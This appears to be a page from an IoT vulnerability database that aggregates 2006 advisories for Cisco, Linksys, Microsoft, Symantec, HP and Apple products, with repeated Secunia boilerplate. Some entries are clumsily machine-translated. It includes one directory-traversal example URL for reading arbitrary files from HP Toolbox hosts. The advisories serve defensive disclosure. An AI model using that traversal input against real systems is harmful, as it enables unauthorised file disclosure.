VARIoT IoT vulnerabilities database

Multiple unspecified vulnerabilities in Linksys RT31P2 VoIP router allow remote attackers to cause a denial of service via malformed Session Initiation Protocol (SIP) messages. Linksys RT31P2 is a broadband router that supports VoIP phone functions. This issue allows remote attackers to crash affected devices, denying service to legitimate users. SOLUTION: The product has reportedly been discontinued. Filter traffic or use another product. PROVIDED AND/OR DISCOVERED BY: Peter Thermos and Guy Hadsall, Telcordia. ORIGINAL ADVISORY: US-CERT VU#621566: http://www.kb.cert.org/vuls/id/621566 ---------------------------------------------------------------------- About: This Advisory was delivered by Secunia as a free service to help everybody keeping their systems up to date against the latest vulnerabilities. Subscribe: http://secunia.com/secunia_security_advisories/ Definitions: (Criticality, Where etc.) http://secunia.com/about_secunia_advisories/ Please Note: Secunia recommends that you verify all advisories you receive by clicking the link. Secunia NEVER sends attached files with advisories. Secunia does not advise people to install third party patches, only use those supplied by the vendor. ---------------------------------------------------------------------- Unsubscribe: Secunia Security Advisories http://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org ----------------------------------------------------------------------

Cisco CiscoWorks Wireless LAN Solution Engine (WLSE) and WLSE Express before 2.13, Hosting Solution Engine (HSE) and User Registration Tool (URT) before 20060419, and all versions of Ethernet Subscriber Solution Engine (ESSE) and CiscoWorks2000 Service Management Solution (SMS) allow local users to gain Linux shell access via shell metacharacters in arguments to the "show" command in the application's command line interface (CLI), aka bug ID CSCsd21502 (WLSE), CSCsd22861 (URT), and CSCsd22859 (HSE). NOTE: other issues might be addressed by the Cisco advisory. plural Cisco The product includes Linux A vulnerability exists that allows shell access to be obtained.By local users Linux Shell access may be obtained. Multiple Linux-based Cisco products are prone to a local privilege-escalation vulnerability. The applications fail to properly sanitize user-supplied input. This issue allows attackers with telnet or SSH access to affected devices to execute arbitrary shell commands with superuser privileges. This facilitates the complete compromise of affected devices. CiscoWorks WLSE is the centralized system-level application for managing and controlling the entire autonomous Cisco WLAN infrastructure. There is a vulnerability in the implementation of the CiscoWorks WLSE configuration management script. Attackers may exploit this vulnerability to obtain sensitive information. The \"displayMsg\" parameter in /wlse/configure/archive/archiveApplyDisplay.jsp in WLSE devices can lead to a cross-site scripting vulnerability. Attackers can exploit this vulnerability to steal JSP session cookies, and then combine it with other vulnerabilities to gain administrative-level access to the system. This is related to vulnerability #2 in: SA19736 SOLUTION: Apply fixes. Cisco URT: Update to version 2.5.5(A1) for the URT appliance. http://www.cisco.com/pcgi-bin/tablebuild.pl/urt-3des Cisco HSE: Apply HSE-PSIRT1 patch. However, Cisco encourages customers requiring a fix to open a service request through the Technical Support organization. TITLE: Cisco WLSE Privilege Escalation and Cross-Site Scripting SECUNIA ADVISORY ID: SA19736 VERIFY ADVISORY: http://secunia.com/advisories/19736/ CRITICAL: Less critical IMPACT: Cross Site Scripting, Privilege escalation WHERE: >From remote OPERATING SYSTEM: CiscoWorks Wireless LAN Solution Engine 2.x http://secunia.com/product/2187/ DESCRIPTION: Adam Pointon has reported two vulnerabilities in CiscoWorks Wireless LAN Solution Engine (WLSE), which can be exploited by malicious, local users to gain escalated privileges or by malicious people to conduct cross-site scripting attacks. 1) Input passed to the "displayMsg" parameter in "/wlse/configure/archive/archiveApplyDisplay.jsp" in the WLSE appliance web interface is not properly sanitised before being returned to users. This can be exploited to execute arbitrary HTML and script code in a user's browser session in context of a vulnerable site. 2) Several errors in the "show" CLI application can be exploited to gain a shell account with root privileges from the command line interface. SOLUTION: Update to version 2.13 or later. http://www.cisco.com/pcgi-bin/tablebuild.pl/wlan-sol-eng PROVIDED AND/OR DISCOVERED BY: Adam Pointon, Assurance. The vendor also credits Mathieu Pepin for reporting the second vulnerability. ORIGINAL ADVISORY: Cisco: http://www.cisco.com/warp/public/707/cisco-sa-20060419-wlse.shtml http://www.cisco.com/warp/public/707/cisco-sr-20060419-priv.shtml Assurance: http://www.assurance.com.au/advisories/200604-cisco.txt ---------------------------------------------------------------------- About: This Advisory was delivered by Secunia as a free service to help everybody keeping their systems up to date against the latest vulnerabilities. Subscribe: http://secunia.com/secunia_security_advisories/ Definitions: (Criticality, Where etc.) http://secunia.com/about_secunia_advisories/ Please Note: Secunia recommends that you verify all advisories you receive by clicking the link. Secunia NEVER sends attached files with advisories. Secunia does not advise people to install third party patches, only use those supplied by the vendor. ---------------------------------------------------------------------- Unsubscribe: Secunia Security Advisories http://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org ----------------------------------------------------------------------

Cisco IOS XR, when configured for Multi Protocol Label Switching (MPLS) and running on Cisco CRS-1 or Cisco 12000 series routers, allows remote attackers to cause a denial of service (Line card crash) via certain MPLS packets, as identified by Cisco bug ID CSCsc77475. Cisco IOS XR There is a service disruption (Line Card crash ) There are vulnerabilities that are put into a state.Service disruption by a third party (Line Card crash ) There is a possibility of being put into a state. A successful attack results in a denial-of-service condition for traffic that is being switched on an affected Modular Services Card (MSC) or line card. A sustained denial-of-service condition can also arise from repeated attacks. Cisco IOS XR Software, a member of the Cisco IOS Software family, uses a microkernel-based distributed operating system infrastructure. Cisco IOS XR runs on Cisco CRS-1 and Cisco 12000 series routers. MPLS packets are forwarded through the MPLS network, so the packets that trigger this vulnerability can be sent from remote systems in the MPLS network. Such packets cannot be received on interfaces that are not configured with MPLS. Successful exploitation requires that MPLS has been configured on the network device. SOLUTION: Apply patches (see patch matrix in vendor advisory). PROVIDED AND/OR DISCOVERED BY: Reported by the vendor. ORIGINAL ADVISORY: Cisco: http://www.cisco.com/warp/public/707/cisco-sa-20060419-xr.shtml ---------------------------------------------------------------------- About: This Advisory was delivered by Secunia as a free service to help everybody keeping their systems up to date against the latest vulnerabilities. Subscribe: http://secunia.com/secunia_security_advisories/ Definitions: (Criticality, Where etc.) http://secunia.com/about_secunia_advisories/ Please Note: Secunia recommends that you verify all advisories you receive by clicking the link. Secunia NEVER sends attached files with advisories. Secunia does not advise people to install third party patches, only use those supplied by the vendor. ---------------------------------------------------------------------- Unsubscribe: Secunia Security Advisories http://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org ----------------------------------------------------------------------

Cross-site scripting (XSS) vulnerability in the appliance web user interface in Cisco CiscoWorks Wireless LAN Solution Engine (WLSE) and WLSE Express before 2.13 allows remote attackers to inject arbitrary web script or HTML, possibly via the displayMsg parameter to archiveApplyDisplay.jsp, aka bug ID CSCsc01095. CiscoWorks Wireless LAN Solution Engine (WLSE) is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input. An attacker may leverage this issue to have arbitrary script code executed in the browser of an unsuspecting user in the context of the affected site. This may help the attacker steal JSP session cookie-based authentication credentials and launch other attacks. CiscoWorks WLSE is the centralized system-level application for managing and controlling the entire autonomous Cisco WLAN infrastructure. There is a vulnerability in the implementation of the CiscoWorks WLSE configuration management script. Attackers may exploit this vulnerability to obtain sensitive information. The "displayMsg" parameter in /wlse/configure/archive/archiveApplyDisplay.jsp in WLSE devices can lead to a cross-site scripting vulnerability. This is related to vulnerability #2 in: SA19736 SOLUTION: Apply fixes. Cisco URT: Update to version 2.5.5(A1) for the URT appliance. http://www.cisco.com/pcgi-bin/tablebuild.pl/urt-3des Cisco HSE: Apply HSE-PSIRT1 patch. 1) Input passed to the "displayMsg" parameter in "/wlse/configure/archive/archiveApplyDisplay.jsp" in the WLSE appliance web interface is not properly sanitised before being returned to users. 2) Several errors in the "show" CLI application can be exploited to gain a shell account with root privileges from the command line interface. SOLUTION: Update to version 2.13 or later. http://www.cisco.com/pcgi-bin/tablebuild.pl/wlan-sol-eng PROVIDED AND/OR DISCOVERED BY: Adam Pointon, Assurance. The vendor also credits Mathieu Pepin for reporting the second vulnerability. ORIGINAL ADVISORY: Cisco: http://www.cisco.com/warp/public/707/cisco-sa-20060419-wlse.shtml http://www.cisco.com/warp/public/707/cisco-sr-20060419-priv.shtml Assurance: http://www.assurance.com.au/advisories/200604-cisco.txt ---------------------------------------------------------------------- About: This Advisory was delivered by Secunia as a free service to help everybody keeping their systems up to date against the latest vulnerabilities. Subscribe: http://secunia.com/secunia_security_advisories/ Definitions: (Criticality, Where etc.) http://secunia.com/about_secunia_advisories/ Please Note: Secunia recommends that you verify all advisories you receive by clicking the link. Secunia NEVER sends attached files with advisories. Secunia does not advise people to install third party patches, only use those supplied by the vendor. ---------------------------------------------------------------------- Unsubscribe: Secunia Security Advisories http://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org ----------------------------------------------------------------------

Untrusted search path vulnerability in unspecified components in Symantec LiveUpdate for Macintosh 3.0.0 through 3.5.0 do not set the execution path, which allows local users to gain privileges via a Trojan horse program. Symantec LiveUpdate for Macintosh is prone to a local privilege-escalation vulnerability. This issue is due to the application's failure to properly use the PATH environment variable in some of its components. A successful exploit allows local attackers to gain superuser privileges, leading to a complete compromise of the affected computer. TITLE: Symantec LiveUpdate for Machintosh Privilege Escalation SECUNIA ADVISORY ID: SA19682 VERIFY ADVISORY: http://secunia.com/advisories/19682/ CRITICAL: Less critical IMPACT: Privilege escalation WHERE: Local system SOFTWARE: Symantec Norton Utilities for Macintosh 8.x http://secunia.com/product/5953/ Symantec Norton SystemWorks for Macintosh 3.x http://secunia.com/product/5952/ Symantec Norton Personal Firewall for Macintosh 3.x http://secunia.com/product/5950/ Symantec Norton Internet Security for Macintosh 3.x http://secunia.com/product/5951/ Symantec Norton AntiVirus for Macintosh 9.x http://secunia.com/product/5948/ Symantec Norton AntiVirus for Macintosh 10.x http://secunia.com/product/5949/ Symantec LiveUpdate for Macintosh 3.x http://secunia.com/product/5954/ DESCRIPTION: A vulnerability has been reported in Symantec LiveUpdate for Machintosh, which can be exploited by malicious, local users to gain escalated privileges. SOLUTION: Apply latest LiveUpdate patch. PROVIDED AND/OR DISCOVERED BY: The vendor credits DigitalMunition.com. ORIGINAL ADVISORY: http://securityresponse.symantec.com/avcenter/security/Content/2006.04.17b.html ---------------------------------------------------------------------- About: This Advisory was delivered by Secunia as a free service to help everybody keeping their systems up to date against the latest vulnerabilities. Subscribe: http://secunia.com/secunia_security_advisories/ Definitions: (Criticality, Where etc.) http://secunia.com/about_secunia_advisories/ Please Note: Secunia recommends that you verify all advisories you receive by clicking the link. Secunia NEVER sends attached files with advisories. Secunia does not advise people to install third party patches, only use those supplied by the vendor. ---------------------------------------------------------------------- Unsubscribe: Secunia Security Advisories http://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org ----------------------------------------------------------------------

Microsoft Internet Explorer 5.01 through 6 allows remote attackers to conduct phishing attacks by spoofing the address bar and other parts of the trust UI via unknown methods that allow "window content to persist" after the user has navigated to another site, aka the "Address Bar Spoofing Vulnerability." NOTE: this is a different vulnerability than CVE-2006-1626. Microsoft Internet Explorer is prone to address-bar spoofing. Attackers may exploit this via a malicious web page to spoof the contents of a page that the victim may trust. This vulnerability may be useful in phishing or other attacks that rely on content spoofing. TITLE: Internet Explorer Multiple Vulnerabilities SECUNIA ADVISORY ID: SA18957 VERIFY ADVISORY: http://secunia.com/advisories/18957/ CRITICAL: Highly critical IMPACT: Spoofing, System access, Cross Site Scripting WHERE: >From remote SOFTWARE: Microsoft Internet Explorer 5.5 http://secunia.com/product/10/ Microsoft Internet Explorer 5.01 http://secunia.com/product/9/ Microsoft Internet Explorer 6.x http://secunia.com/product/11/ DESCRIPTION: Multiple vulnerabilities have been reported in Internet Explorer, which can be exploited by malicious people to conduct cross-site scripting attacks, conduct phishing attacks, or compromise a user's system. 1) An error in the cross-domain restriction when accessing properties of certain dynamically created objects can be exploited to execute arbitrary HTML and script code in a user's browser session in context of an arbitrary site via a JavaScript URI handler applied on a dynamically created "object" tag. 2) An error within the handling of multiple event handlers (e.g. onLoad) in an HTML element can be exploited to corrupt memory in a way that may allow execution of arbitrary code. 3) An error within the parsing of specially crafted, non-valid HTML can be exploited to corrupt memory in a way that allows execution of arbitrary code when a malicious HTML document is viewed. 4) An error within the instantiation of COM objects that are not intended to be instantiated in Internet Explorer can be exploited to corrupt memory in a way that allows execution of arbitrary code. 5) An error within the handling of HTML elements containing a specially crafted tag can be exploited to corrupt memory in a way that allows execution of arbitrary code. 6) An error within the handling of double-byte characters in specially crafted URLs can be exploited to corrupt memory in a way that allows execution of arbitrary code. Successful exploitation requires that the system uses double-byte character sets. 7) An error in the way IOleClientSite information is returned when an embedded object is dynamically created can be exploited to execute arbitrary code in context of another site or security zone. 8) An unspecified error can be exploited to spoof information displayed in the address bar and other parts of the trust UI. 9) Some unspecified vulnerabilities exist in the two ActiveX controls included with Danim.dll and Dxtmsft.dll. SOLUTION: Apply patches. Internet Explorer 5.01 SP4 on Windows 2000 SP4: http://www.microsoft.com/downloa...7B87-AF8F-4346-9164-596E3E5C22B1 Internet Explorer 6 SP1 on Windows 2000 SP4 or Windows XP SP1: http://www.microsoft.com/downloa...41E1-2B36-4696-987A-099FC57E0129 Internet Explorer 6 for Windows XP SP2: http://www.microsoft.com/downloa...FB31-E6B4-4771-81F1-4ACCEBF72133 Internet Explorer 6 for Windows Server 2003 and Windows Server 2003 SP1: http://www.microsoft.com/downloa...6871-D217-41D3-BECC-B27FAFA00054 Internet Explorer 6 for Windows Server 2003 for Itanium-based systems and Windows Server 2003 with SP1 for Itanium-based systems: http://www.microsoft.com/downloa...957C-0ABE-4129-ABAF-AA2852AD62A3 Internet Explorer 6 for Windows Server 2003 x64 Edition: http://www.microsoft.com/downloa...8BE3-39EE-4937-9BD1-280FC35125C6 Internet Explorer 6 for Windows XP Professional x64 Edition: http://www.microsoft.com/downloa...FE3E-620A-4BBC-868B-CA2D9EFF7AC3 Internet Explorer 6 SP1 on Windows 98, Windows 98 SE, or Windows ME: Patches are available via the Microsoft Update Web site or the Windows Update Web site. PROVIDED AND/OR DISCOVERED BY: 1) Discovered by anonymous person. 2) Michal Zalewski 3) The vendor credits Jan P. Monsch, Compass Security Network Computing. 4) The vendor credits Richard M. Smith, Boston Software Forensics. 5) The vendor credits Thomas Waldegger. 6) The vendor credits Sowhat, Nevis Labs. 7) The vendor credits Heiko Schultze, SAP. 9) The vendor credits Will Dormann, CERT/CC. ORIGINAL ADVISORY: MS06-013 (KB912812): http://www.microsoft.com/technet/security/Bulletin/MS06-013.mspx ---------------------------------------------------------------------- About: This Advisory was delivered by Secunia as a free service to help everybody keeping their systems up to date against the latest vulnerabilities. Subscribe: http://secunia.com/secunia_security_advisories/ Definitions: (Criticality, Where etc.) http://secunia.com/about_secunia_advisories/ Please Note: Secunia recommends that you verify all advisories you receive by clicking the link. Secunia NEVER sends attached files with advisories. Secunia does not advise people to install third party patches, only use those supplied by the vendor. ---------------------------------------------------------------------- Unsubscribe: Secunia Security Advisories http://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org ----------------------------------------------------------------------

Cross-site scripting (XSS) vulnerability in _vti_bin/_vti_adm/fpadmdll.dll in Microsoft FrontPage Server Extensions 2002 and SharePoint Team Services allows remote attackers to inject arbitrary web script or HTML, then leverage the attack to execute arbitrary programs or create new accounts, via the (1) operation, (2) command, and (3) name parameters. Microsoft FrontPage Server Extensions are prone to a cross-site scripting vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input before it is rendered to other users. An attacker may leverage this issue to have arbitrary script code executed in the browser of an unsuspecting user, with the privileges of the victim userâ??s account. This may help the attacker steal cookie-based authentication credentials and launch other attacks. SOLUTION: Apply patches. FrontPage Server Extensions 2002 (Windows Server 2003 and Windows Server 2003 SP1): http://www.microsoft.com/downloads/details.aspx?FamilyId=5C03F85A-5228-47FB-A338-90FA23818E08 FrontPage Server Extensions 2002 (Windows Server 2003 for Itanium-based systems and Windows Server 2003 with SP1 for Itanium-based systems): http://www.microsoft.com/downloads/details.aspx?FamilyId=59F15A6B-CC1B-43D5-A007-BFC9ABB63486 FrontPage Server Extensions 2002 (x64 Edition) downloaded and installed on Windows Server 2003 x64 Edition and Windows XP Pro x64 Edition: http://www.microsoft.com/downloads/details.aspx?FamilyId=F453530D-7063-49AB-B304-9C455DE6D8DA FrontPage Server Extensions 2002 (x86 Editions) downloaded and installed on Windows Server 2000 SP4, Windows XP SP1, and Windows XP SP2: http://www.microsoft.com/downloads/details.aspx?FamilyId=F453530D-7063-49AB-B304-9C455DE6D8DA Microsoft SharePoint Team Services: http://www.microsoft.com/downloads/details.aspx?FamilyId=EEE40662-39E6-4C07-8241-1AC4F5D24FFC PROVIDED AND/OR DISCOVERED BY: The vendor credits Esteban Mart\xednez Fay\xf3. ORIGINAL ADVISORY: MS06-017 (KB917627): http://www.microsoft.com/technet/security/Bulletin/MS06-017.mspx ---------------------------------------------------------------------- About: This Advisory was delivered by Secunia as a free service to help everybody keeping their systems up to date against the latest vulnerabilities. Subscribe: http://secunia.com/secunia_security_advisories/ Definitions: (Criticality, Where etc.) http://secunia.com/about_secunia_advisories/ Please Note: Secunia recommends that you verify all advisories you receive by clicking the link. Secunia NEVER sends attached files with advisories. Secunia does not advise people to install third party patches, only use those supplied by the vendor. ---------------------------------------------------------------------- Unsubscribe: Secunia Security Advisories http://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org ----------------------------------------------------------------------

Control cards for Cisco Optical Networking System (ONS) 15000 series nodes before 20060405 allow remote attackers to cause a denial of service (memory exhaustion and possibly card reset) by sending an invalid response when the final ACK is expected, aka bug ID CSCei45910. Cisco Optical Networking System (ONS) The denial of service (DoS) There is a vulnerability that can be exploited.Denial of service by third party (DoS) May be in a state. The response, which is also known as bug ID CSCei45910. Cisco Optical Networking System and Transport Controller are prone to multiple vulnerabilities. Cisco Optical Networking System 15000 series are affected by multiple denial-of-service vulnerabilities. Cisco Transport Controller is prone to an arbitrary code-execution vulnerability. 1) Multiple services are vulnerable to ACK DoS attacks where an invalid response is sent instead of the final ACK packet during the 3-way handshake. This can be exploited to cause the control cards to exhaust memory resources, not respond to further connections, or reset by establishing multiple of these connections. Successful exploitation requires that IP is configured on the LAN interface (enabled by default). 2) An error within the processing of IP packets can be exploited to reset the control cards by sending a specially crafted IP packet. Successful exploitation requires that IP is configured on the LAN interface (enabled by default) and secure mode for element management system (EMS)-to-network-element access is enabled (disabled by default). 3) Another error within the processing of IP packets can be exploited to reset the control cards by sending a specially crafted IP packet. Successful exploitation requires that IP is configured on the LAN interface (enabled by default). 4) An error within the processing of OSPF (Open Shortest Path First) packets can be exploited to reset the control cards by sending a specially crafted OSPF packet. Successful exploitation requires that the OSPF routing protocol is configured on the LAN interface (disabled by default). Successful exploitation of the above vulnerabilities (#1 through #4) requires that the Optical node has the Common Control Card connected to a DCN (Data Communication Network) and is enabled for IPv4. The above vulnerabilities (#1 through #4) affect the following Cisco ONS 15000 series platforms: * Cisco ONS 15310-CL Series * Cisco ONS 15327 Series * Cisco ONS 15454 MSPP * Cisco ONS 15454 MSTP * Cisco ONS 15600 Series The following Cisco ONS 15000 series platforms are not affected by the vulnerabilities: * Cisco ONS 15100 Series * Cisco ONS 15200 Series * Cisco ONS 15302, ONS 15305, and ONS 15310-MA platforms * Cisco ONS 15500 Series * Cisco ONS 15800 Series 5) A vulnerability exists within the Cisco Transport Controller (CTC) applet launcher, which is downloaded each time a management connection is made to the Optical node. The vulnerability is caused due to the java.policy permissions being to broad by granting all permissions to any software originating from the codeBase or source at http://*/fs/LAUNCHER.jar. This can be exploited to execute arbitrary code on the CTC workstation if it is used to connect to a malicious web site running Java code from the "/fs/LAUNCHER.jar" location. The vulnerability affects versions 4.0.x and prior. SOLUTION: 1-4) Updated versions are available (see patch matrix in vendor advisory). PROVIDED AND/OR DISCOVERED BY: Reported by vendor. ORIGINAL ADVISORY: http://www.cisco.com/warp/public/707/cisco-sa-20060405-ons.shtml ---------------------------------------------------------------------- About: This Advisory was delivered by Secunia as a free service to help everybody keeping their systems up to date against the latest vulnerabilities. Subscribe: http://secunia.com/secunia_security_advisories/ Definitions: (Criticality, Where etc.) http://secunia.com/about_secunia_advisories/ Please Note: Secunia recommends that you verify all advisories you receive by clicking the link. Secunia NEVER sends attached files with advisories. Secunia does not advise people to install third party patches, only use those supplied by the vendor. ---------------------------------------------------------------------- Unsubscribe: Secunia Security Advisories http://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org ----------------------------------------------------------------------

Unspecified vulnerability in the HTTP compression functionality in Cisco CSS 11500 Series Content Services switches allows remote attackers to cause a denial of service (device reload) via (1) "valid, but obsolete" or (2) "specially crafted" HTTP requests. The Cisco CSS 11500 Content Services Switch is a load balancing device that provides robust and scalable network services (Layer 4-7) for data centers.  The Cisco CSS 11500 has a vulnerability in processing HTTP packets. Successful exploitation of this vulnerability can lead to device reloads and repeated attacks can lead to persistent denial of service. A successful attack can allow an attacker to trigger a reload on the device. A sustained denial-of-service condition can also arise due to repeated attacks. Successful exploitation requires that the network device has been configured for HTTP compression. SOLUTION: Update to version 8.10.1.6. http://www.cisco.com/pcgi-bin/tablebuild.pl/css11500-maint?psrtdcat20e2 Disable HTTP compression. PROVIDED AND/OR DISCOVERED BY: Reported by vendor. ORIGINAL ADVISORY: http://www.cisco.com/warp/public/707/cisco-sa-20060405-css.shtml ---------------------------------------------------------------------- About: This Advisory was delivered by Secunia as a free service to help everybody keeping their systems up to date against the latest vulnerabilities. Subscribe: http://secunia.com/secunia_security_advisories/ Definitions: (Criticality, Where etc.) http://secunia.com/about_secunia_advisories/ Please Note: Secunia recommends that you verify all advisories you receive by clicking the link. Secunia NEVER sends attached files with advisories. Secunia does not advise people to install third party patches, only use those supplied by the vendor. ---------------------------------------------------------------------- Unsubscribe: Secunia Security Advisories http://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org ----------------------------------------------------------------------

The installation of Cisco Transport Controller (CTC) for Cisco Optical Networking System (ONS) 15000 series nodes adds a Java policy file entry with a wildcard that grants the java.security.AllPermission permission to any http URL containing "fs/LAUNCHER.jar", which allows remote attackers to execute arbitrary code on a CTC workstation, aka bug ID CSCea25049. Cisco Optical Networking System and Transport Controller are prone to multiple vulnerabilities. Cisco Optical Networking System 15000 series are affected by multiple denial-of-service vulnerabilities. Cisco Transport Controller is prone to an arbitrary code-execution vulnerability. This java file has java. 1) Multiple services are vulnerable to ACK DoS attacks where an invalid response is sent instead of the final ACK packet during the 3-way handshake. This can be exploited to cause the control cards to exhaust memory resources, not respond to further connections, or reset by establishing multiple of these connections. Successful exploitation requires that IP is configured on the LAN interface (enabled by default). 2) An error within the processing of IP packets can be exploited to reset the control cards by sending a specially crafted IP packet. Successful exploitation requires that IP is configured on the LAN interface (enabled by default) and secure mode for element management system (EMS)-to-network-element access is enabled (disabled by default). 3) Another error within the processing of IP packets can be exploited to reset the control cards by sending a specially crafted IP packet. Successful exploitation requires that IP is configured on the LAN interface (enabled by default). 4) An error within the processing of OSPF (Open Shortest Path First) packets can be exploited to reset the control cards by sending a specially crafted OSPF packet. Successful exploitation requires that the OSPF routing protocol is configured on the LAN interface (disabled by default). Successful exploitation of the above vulnerabilities (#1 through #4) requires that the Optical node has the Common Control Card connected to a DCN (Data Communication Network) and is enabled for IPv4. The above vulnerabilities (#1 through #4) affect the following Cisco ONS 15000 series platforms: * Cisco ONS 15310-CL Series * Cisco ONS 15327 Series * Cisco ONS 15454 MSPP * Cisco ONS 15454 MSTP * Cisco ONS 15600 Series The following Cisco ONS 15000 series platforms are not affected by the vulnerabilities: * Cisco ONS 15100 Series * Cisco ONS 15200 Series * Cisco ONS 15302, ONS 15305, and ONS 15310-MA platforms * Cisco ONS 15500 Series * Cisco ONS 15800 Series 5) A vulnerability exists within the Cisco Transport Controller (CTC) applet launcher, which is downloaded each time a management connection is made to the Optical node. The vulnerability is caused due to the java.policy permissions being to broad by granting all permissions to any software originating from the codeBase or source at http://*/fs/LAUNCHER.jar. The vulnerability affects versions 4.0.x and prior. SOLUTION: 1-4) Updated versions are available (see patch matrix in vendor advisory). PROVIDED AND/OR DISCOVERED BY: Reported by vendor. ORIGINAL ADVISORY: http://www.cisco.com/warp/public/707/cisco-sa-20060405-ons.shtml ---------------------------------------------------------------------- About: This Advisory was delivered by Secunia as a free service to help everybody keeping their systems up to date against the latest vulnerabilities. Subscribe: http://secunia.com/secunia_security_advisories/ Definitions: (Criticality, Where etc.) http://secunia.com/about_secunia_advisories/ Please Note: Secunia recommends that you verify all advisories you receive by clicking the link. Secunia NEVER sends attached files with advisories. Secunia does not advise people to install third party patches, only use those supplied by the vendor. ---------------------------------------------------------------------- Unsubscribe: Secunia Security Advisories http://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org ----------------------------------------------------------------------

Control cards for Cisco Optical Networking System (ONS) 15000 series nodes before 20060405 allow remote attackers to cause a denial of service (card reset) via (1) a "crafted" IP packet to a device with secure mode EMS-to-network-element access, aka bug ID CSCsc51390; (2) a "crafted" IP packet to a device with IP on the LAN interface, aka bug ID CSCsd04168; and (3) a "malformed" OSPF packet, aka bug ID CSCsc54558. Cisco Optical Networking System (ONS) In Denial of service ( Card reset ) There is a vulnerability that can be exploited.Denial of service by third party ( Card reset ) May be in a state. Cisco Optical Networking System and Transport Controller are prone to multiple vulnerabilities. Cisco Optical Networking System 15000 series are affected by multiple denial-of-service vulnerabilities. Cisco Transport Controller is prone to an arbitrary code-execution vulnerability. 1) Multiple services are vulnerable to ACK DoS attacks where an invalid response is sent instead of the final ACK packet during the 3-way handshake. This can be exploited to cause the control cards to exhaust memory resources, not respond to further connections, or reset by establishing multiple of these connections. Successful exploitation requires that IP is configured on the LAN interface (enabled by default). 2) An error within the processing of IP packets can be exploited to reset the control cards by sending a specially crafted IP packet. Successful exploitation requires that IP is configured on the LAN interface (enabled by default) and secure mode for element management system (EMS)-to-network-element access is enabled (disabled by default). 3) Another error within the processing of IP packets can be exploited to reset the control cards by sending a specially crafted IP packet. Successful exploitation requires that IP is configured on the LAN interface (enabled by default). 4) An error within the processing of OSPF (Open Shortest Path First) packets can be exploited to reset the control cards by sending a specially crafted OSPF packet. Successful exploitation requires that the OSPF routing protocol is configured on the LAN interface (disabled by default). Successful exploitation of the above vulnerabilities (#1 through #4) requires that the Optical node has the Common Control Card connected to a DCN (Data Communication Network) and is enabled for IPv4. The above vulnerabilities (#1 through #4) affect the following Cisco ONS 15000 series platforms: * Cisco ONS 15310-CL Series * Cisco ONS 15327 Series * Cisco ONS 15454 MSPP * Cisco ONS 15454 MSTP * Cisco ONS 15600 Series The following Cisco ONS 15000 series platforms are not affected by the vulnerabilities: * Cisco ONS 15100 Series * Cisco ONS 15200 Series * Cisco ONS 15302, ONS 15305, and ONS 15310-MA platforms * Cisco ONS 15500 Series * Cisco ONS 15800 Series 5) A vulnerability exists within the Cisco Transport Controller (CTC) applet launcher, which is downloaded each time a management connection is made to the Optical node. The vulnerability is caused due to the java.policy permissions being to broad by granting all permissions to any software originating from the codeBase or source at http://*/fs/LAUNCHER.jar. This can be exploited to execute arbitrary code on the CTC workstation if it is used to connect to a malicious web site running Java code from the "/fs/LAUNCHER.jar" location. The vulnerability affects versions 4.0.x and prior. SOLUTION: 1-4) Updated versions are available (see patch matrix in vendor advisory). PROVIDED AND/OR DISCOVERED BY: Reported by vendor. ORIGINAL ADVISORY: http://www.cisco.com/warp/public/707/cisco-sa-20060405-ons.shtml ---------------------------------------------------------------------- About: This Advisory was delivered by Secunia as a free service to help everybody keeping their systems up to date against the latest vulnerabilities. Subscribe: http://secunia.com/secunia_security_advisories/ Definitions: (Criticality, Where etc.) http://secunia.com/about_secunia_advisories/ Please Note: Secunia recommends that you verify all advisories you receive by clicking the link. Secunia NEVER sends attached files with advisories. Secunia does not advise people to install third party patches, only use those supplied by the vendor. ---------------------------------------------------------------------- Unsubscribe: Secunia Security Advisories http://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org ----------------------------------------------------------------------

Directory traversal vulnerability in the HP Color LaserJet 2500 Toolbox and Color LaserJet 4600 Toolbox on Microsoft Windows before 20060402 allows remote attackers to read arbitrary files via a .. (dot dot) in an HTTP GET request to TCP port 5225. This issue is due to a failure in the application to properly sanitize user-supplied input. An attacker can exploit this vulnerability to retrieve arbitrary files from the vulnerable system in the context of the affected application. Information obtained may aid attackers in further attacks. The vulnerability is caused due to an input validation error in the built-in HTTP server. This can be exploited to disclose the contents of arbitrary files via directory traversal attacks. Example: http://[host]:5225/../../../[file] SOLUTION: Update to version 3.1. Subscribe: http://secunia.com/secunia_security_advisories/ Definitions: (Criticality, Where etc.) http://secunia.com/about_secunia_advisories/ Please Note: Secunia recommends that you verify all advisories you receive by clicking the link. Secunia NEVER sends attached files with advisories. Secunia does not advise people to install third party patches, only use those supplied by the vendor. ---------------------------------------------------------------------- Unsubscribe: Secunia Security Advisories http://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org ----------------------------------------------------------------------

Unspecified vulnerability in Mac OS X before 10.4.6, when running on an Intel-based computer, allows attackers with physical access to bypass the firmware password and log on in Single User Mode via unspecified vectors. Mac OS X running on Intel-based Macintosh computers is prone to an authentication-bypass vulnerability. SOLUTION: Update to version 10.4.6. http://www.apple.com/support/downloads/ PROVIDED AND/OR DISCOVERED BY: The vendor credits David Pugh, University of Michigan. ORIGINAL ADVISORY: Apple: http://docs.info.apple.com/article.html?artnum=303567 ---------------------------------------------------------------------- About: This Advisory was delivered by Secunia as a free service to help everybody keeping their systems up to date against the latest vulnerabilities. Subscribe: http://secunia.com/secunia_security_advisories/ Definitions: (Criticality, Where etc.) http://secunia.com/about_secunia_advisories/ Please Note: Secunia recommends that you verify all advisories you receive by clicking the link. Secunia NEVER sends attached files with advisories. Secunia does not advise people to install third party patches, only use those supplied by the vendor. ---------------------------------------------------------------------- Unsubscribe: Secunia Security Advisories http://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org 